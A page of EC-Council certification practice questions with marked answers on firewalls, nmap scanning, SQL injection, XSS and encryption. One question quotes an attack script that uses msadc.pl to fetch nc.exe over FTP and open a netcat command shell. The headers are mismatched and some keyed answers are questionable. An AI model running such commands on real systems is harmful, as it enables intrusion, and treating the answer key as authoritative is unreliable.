312-50 Certified Ethical Hacker Certification Practice Exam Set 3

One advantage of an application-level firewall is the ability to 



Options are :

  • retain state information for each packet.
  • filter specific commands, such as http:post. (Correct)
  • filter packets at the network level.
  • monitor tcp handshaking.

Answer : filter specific commands, such as http:post.

ECCouncil 712-50 Certified CISO (CCISO) Practice Exam Set 1

The precaution of prohibiting employees from bringing personal computing devices into a facility is what type of security control? 



Options are :

  • Compliance
  • Physical
  • Technical
  • Procedural (Correct)

Answer : Procedural

Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection? 



Options are :

  • NMAP -P0 -A -O -p1-65535 192.168.0/24 (Correct)
  • NMAP -P0 -A -sT -p0-65535 192.168.0/16
  • NMAP -PN -O -sS -p 1-1024 192.168.0/8
  • NMAP -PN -A -O -sS 192.168.2.0/24

Answer : NMAP -P0 -A -O -p1-65535 192.168.0/24

What is the main difference between a “Normal” SQL Injection and a “Blind” SQL Injection vulnerability?



Options are :

  • The attack is called “Blind” because, although the application properly filters user input, it is still vulnerable to code injection.
  • The successful attack does not show an error message to the administrator of the affected application.
  • The request to the web server is not visible to the administrator of the vulnerable application.
  • The vulnerable application does not display errors with information about the injection results to the attacker. (Correct)

Answer : The vulnerable application does not display errors with information about the injection results to the attacker.

ECCouncil ECSS Certified Security Specialist Practice Exam Set 2

The network administrator for a company is setting up a website with e-commerce capabilities. Packet sniffing is a concern because credit card information will be sent electronically over the Internet. Customers visiting the site will need to encrypt the data with HTTPS. Which type of certificate is used to encrypt and decrypt the data? 



Options are :

  • Confidential
  • Non-confidential
  • Symmetric
  • Asymmetric (Correct)

Answer : Asymmetric

What is the main advantage that a network-based IDS/IPS system has over a host-based solution? 



Options are :

  • They are placed at the boundary, allowing them to inspect all traffic.
  • They will not interfere with user interfaces.
  • They do not use host system resources. (Correct)
  • They are easier to install and configure.

Answer : They do not use host system resources.

Which of the following business challenges could be solved by using a vulnerability scanner? 



Options are :

  • Auditors want to discover if all systems are following a standard naming convention.
  • There is an emergency need to remove administrator access from multiple machines for an employee that quit.
  • There is a monthly requirement to test corporate compliance with host application usage and security policies. (Correct)
  • A web server was compromised and management needs to know if any further systems were compromised.

Answer : There is a monthly requirement to test corporate compliance with host application usage and security policies.

ECCouncil 712-50 Certified CISO (CCISO) Practice Exam Set 3

A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records? 



Options are :

  • Set type=ns (Correct)
  • Request type=ns
  • Transfer type=ns
  • Locate type=ns

Answer : Set type=ns

Which of the following techniques does a vulnerability scanner use in order to detect a vulnerability on a target service? 



Options are :

  • Injecting arbitrary data
  • Analyzing service response (Correct)
  • Port scanning
  • Banner grabbing

Answer : Analyzing service response

A company has hired a security administrator to maintain and administer Linux and Windowsbased systems. Written in the nightly report file is the following:  Firewall log files are at the expected value of 4 MB. The current time is 12am. Exactly two hours later the size has decreased considerably. Another hour goes by and the log files have shrunk in size again.  Which of the following actions should the security administrator take? 



Options are :

  • Run an anti-virus scan because it is likely the system is infected by malware.
  • Log the event as suspicious activity and report this behavior to the incident response team immediately.
  • Log the event as suspicious activity, continue to investigate, and act according to the site's security policy. (Correct)
  • Log the event as suspicious activity, call a manager, and report this as soon as possible.

Answer : Log the event as suspicious activity, continue to investigate, and act according to the site's security policy.

ECCouncil 312-49 Computer Hacking Forensic Investigator Exam Set 4

From the two screenshots below, which of the following is occurring?  First one: 1 [10.0.0.253]# nmap -sP 10.0.0.0/24 2 3 Starting Nmap 5 Host 10.0.0.1 appears to be up. 6 MAC Address: 00:09:5B:29:FD:96 (Netgear) 7 Host 10.0.0.2 appears to be up. 8 MAC Address: 00:0F:B5:96:38:5D (Netgear) 9 Host 10.0.0.4 appears to be up. 10 Host 10.0.0.5 appears to be up. 11 MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.) 12 Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds      Second one:    1 [10.0.0.252]# nmap -sO 10.0.0.2 2 3 Starting Nmap 4.01 at 2006-07-14 12:56 BST 4 Interesting protocols on 10.0.0.2: 5 (The 251 protocols scanned but not shown below are 6 in state: closed) 7 PROTOCOL STATE SERVICE 8 1 open icmp 9 2 open|filtered igmp 10 6 open tcp 11 17 open udp 12 255 open|filtered unknown 13 14 Nmap finished: 1 IP address (1 host up) scanned in 15 1.259 seconds



Options are :

  • 10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
  • 10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
  • 10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
  • 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2. (Correct)

Answer : 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.

WPA2 uses AES for wireless data encryption at which of the following encryption levels? 



Options are :

  • 128 bit and CCMP (Correct)
  • 128 bit and CRC
  • 64 bit and CCMP
  • 128 bit and TKIP

Answer : 128 bit and CCMP

What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel room? 



Options are :

  • Set a BIOS password.
  • Use a strong logon password to the operating system.
  • Back up everything on the laptop and store the backup in a safe place.
  • Encrypt the data on the hard drive. (Correct)

Answer : Encrypt the data on the hard drive.

ECCouncil 412-79v8 Certified Security Analyst (ECSA) Exam Set 7

During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with Local System account. How can this weakness be exploited to access the system? 



Options are :

  • Invoking the stored procedure xp_cmdshell to spawn a Windows command shell (Correct)
  • Invoking the stored procedure cmd_shell to spawn a Windows command shell
  • Invoking the stored procedure xp_shell to spawn a Windows command shell
  • Using the Metasploit psexec module setting the SA / Admin credential

Answer : Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Which of the following cryptography attack methods is usually performed without the use of a computer? 



Options are :

  • Rainbow table attack
  • Ciphertext-only attack
  • Rubber hose attack (Correct)
  • Chosen key attack

Answer : Rubber hose attack

An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did not contain management or control packets in the submitted traces. Which of the following is the most likely reason for lack of management or control packets? 



Options are :

  • On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode.
  • Certain operating systems and adapters do not collect the management or control packets. (Correct)
  • The wireless card was not turned on.
  • The wrong network card drivers were in use by Wireshark.

Answer : Certain operating systems and adapters do not collect the management or control packets.

EC0-349 Computer Hacking Forensic Investigator Exam Set 10

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:    system("perl msadc.pl -h $host -C \"echo open $your >testfile\""); system("perl msadc.pl -h $host -C \"echo $user>>testfile\""); system("perl msadc.pl -h $host -C \"echo $pass>>testfile\""); system("perl msadc.pl -h $host -C \"echo bin>>testfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\""); system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\""); ("perl msadc.pl -h $host -C \"echo quit>>testfile\""); system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");  Which exploit is indicated by this script?



Options are :

  • A denial of service exploit
  • A chained exploit (Correct)
  • A SQL injection exploit
  • A buffer overflow exploit

Answer : A chained exploit

Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results? TCP port 21 – no response TCP port 22 – no response TCP port 23 – Time-to-live exceeded 



Options are :

  • The lack of response from ports 21 and 22 indicate that those services are not running on the destination server.
  • The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error.
  • The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.
  • The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall. (Correct)

Answer : The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall.

Which of the statements concerning proxy firewalls is correct? 



Options are :

  • Firewall proxy servers decentralize all activity for an application.
  • Computers establish a connection with a proxy firewall which initiates a new network connection for the client. (Correct)
  • Proxy firewalls block network packets from passing to and from a protected network.
  • Proxy firewalls increase the speed and functionality of a network.

Answer : Computers establish a connection with a proxy firewall which initiates a new network connection for the client.

ECCouncil 312-50 Certified Ethical Hacker Practice Test Set 4

A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The alert was generated because a large number of packets were coming into the network over ports 20 and 21. During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this situation? 



Options are :

  • False positives (Correct)
  • True positives
  • False negatives
  • True negatives

Answer : False positives

During a penetration test, a tester finds that the web application being analyzed is vulnerable to Cross Site Scripting (XSS). Which of the following conditions must be met to exploit this vulnerability? 



Options are :

  • The web application does not have the secure flag set.
  • The victim's browser must have ActiveX technology enabled.
  • The session cookies do not have the HttpOnly flag set. (Correct)
  • The victim user should not have an endpoint security solution.

Answer : The session cookies do not have the HttpOnly flag set.

A Network Administrator was recently promoted to Chief Security Officer at a local university. One of employee's new responsibilities is to manage the implementation of an RFID card access system to a new server room on campus. The server room will house student enrollment information that is securely backed up to an off-site location.  During a meeting with an outside consultant, the Chief Security Officer explains that he is concerned that the existing security controls have not been designed properly. Currently, the Network Administrator is responsible for approving and issuing RFID card access to the server room, as well as reviewing the electronic access logs on a weekly basis.  Which of the following is an issue with the situation? 



Options are :

  • Undue influence
  • Inadequate disaster recovery plan
  • Lack of experience
  • Segregation of duties (Correct)

Answer : Segregation of duties

ECCouncil 312-50 Certified Ethical Hacker Practice Test Set 1

During a penetration test, the tester conducts an ACK scan using NMAP against the external interface of the DMZ firewall. NMAP reports that port 80 is unfiltered. Based on this response, which type of packet inspection is the firewall conducting? 



Options are :

  • Stateful
  • Stateless (Correct)
  • Host
  • Application

Answer : Stateless

Which set of access control solutions implements two-factor authentication? 



Options are :

  • USB token and PIN (Correct)
  • Fingerprint scanner and retina scanner
  • Password and PIN
  • Account and password

Answer : USB token and PIN

One way to defeat a multi-level security solution is to leak data via 



Options are :

  • steganography.
  • asymmetric routing.
  • a bypass regulator.
  • a covert channel. (Correct)

Answer : a covert channel.

ECCouncil 412-79v8 Certified Security Analyst (ECSA) Exam Set 6

A person approaches a network administrator and wants advice on how to send encrypted email from home. The end user does not want to have to pay for any license fees or manage server services. Which of the following is the most secure encryption protocol that the network administrator should recommend? 



Options are :

  • Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)
  • IP Security (IPSEC)
  • Multipurpose Internet Mail Extensions (MIME)
  • Pretty Good Privacy (PGP) (Correct)

Answer : Pretty Good Privacy (PGP)

ICMP ping and ping sweeps are used to check for active systems and to check 



Options are :

  • the route that the ICMP ping took.
  • if ICMP ping traverses a firewall. (Correct)
  • the location of the switchport in relation to the ICMP ping.
  • the number of hops an ICMP ping takes to reach a destination.

Answer : if ICMP ping traverses a firewall.

On a Linux device, which of the following commands will start the Nessus client in the background so that the Nessus server can be configured? 



Options are :

  • nessus & (Correct)
  • nessus +
  • nessus -d
  • nessus *s

Answer : nessus &

712-50 EC-Council Certified CISO Certification Practice Exam Set 9

A penetration tester is attempting to scan an internal corporate network from the internet without alerting the border sensor. Which is the most efficient technique should the tester consider using? 



Options are :

  • Tunneling over high port numbers
  • Scanning using fragmented IP packets
  • Tunneling scan over SSH (Correct)
  • Spoofing an IP address

Answer : Tunneling scan over SSH

What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack? 



Options are :

  • Setting a user's session identifier (SID) to an explicit known value
  • Inserting malicious Javascript code into input parameters
  • Injecting parameters into a connection string using semicolons as a separator (Correct)
  • Adding multiple parameters with the same name in HTTP requests

Answer : Injecting parameters into a connection string using semicolons as a separator

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions